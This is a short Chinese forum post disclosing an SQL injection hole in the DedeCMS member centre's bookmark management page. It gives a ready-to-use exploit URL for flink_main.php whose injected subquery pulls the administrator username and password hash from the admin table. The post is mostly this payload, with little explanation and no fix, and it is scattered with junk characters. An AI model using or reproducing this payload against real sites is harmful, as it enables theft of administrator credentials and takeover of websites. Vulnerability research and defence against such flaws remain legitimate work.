DedeCMS会员中心SQL注射漏洞
2 R7 e3 E" d6 Q: ^2 m3 U! F需要magic_quotes_gpc = Off6 u" C2 t. z9 W3 _! N
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
6 U+ j! l O9 g( L9 }
8 z, E' s6 E: G4 p. S4 JDedeCMS会员中心书签管理SQL注射漏洞
4 U: D' s* o1 J/ F- j成功利用该漏洞可获得管理员密码' h: b1 ^, M! U1 W
0 l5 D5 n7 T* m. a
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码+ z4 M* v4 w( r; c: d- S
. y: I% n& U9 Z6 N. {
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
: X2 m/ Y3 U: T% h0 \ |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59